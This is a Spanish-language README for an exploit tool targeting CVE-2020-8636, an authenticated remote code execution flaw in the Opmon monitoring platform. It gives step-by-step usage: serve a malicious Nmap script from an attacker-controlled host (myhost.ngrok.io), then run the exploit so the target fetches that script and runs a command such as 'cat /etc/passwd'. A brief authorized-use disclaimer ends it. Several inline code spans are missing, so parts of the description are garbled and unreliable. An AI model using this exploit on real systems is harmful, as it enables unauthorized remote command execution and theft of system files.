
CVE-2020-8636 exploit de ejecución remota de código autenticado para Opmon
Acerca de • Instalación • Uso • Licencia
OpMonster es un exploit de prueba de concepto para CVE-2020-8636, una vulnerabilidad de ejecución remota de código en la plataforma de monitoreo Opmon. Abusa del endpoint nettools.php, que permite ejecutar Nmap con opciones arbitrarias. El exploit obliga a Opmon a buscar un script malicioso desde un servidor que controlas (mediante ), lo coloca en , luego lo ejecuta para correr tu comando en el objetivo y muestra la salida.
--script.nsehttp-fetch/tmpDescubierto y desarrollado por @phor3nsic. Más detalles: Tres CVEs en Opmon.
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests
Primero, inicia un servidor web en un host al que el objetivo pueda acceder, en un directorio donde el script .nse generado pueda ser descargado (el exploit escribe el script en el directorio actual):
php -S 0.0.0.0:1337
Luego ejecuta el exploit con cuatro argumentos posicionales:
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"
| Argumento | Descripción |
|---|---|
HOST | URL base de Opmon objetivo (ej. https://vulnhost.com) |
LHOST | Tu host del servidor que sirve el script .nse |
LPORT | Tu puerto del servidor |
CMD | Comando a ejecutar en el objetivo |
El exploit aborta con un mensaje si el objetivo no descarga el script ("no vulnerable") o no puede hacer una conexión saliente a tu servidor.
Solo para pruebas de seguridad autorizadas y educación. Eres responsable de cómo lo usas.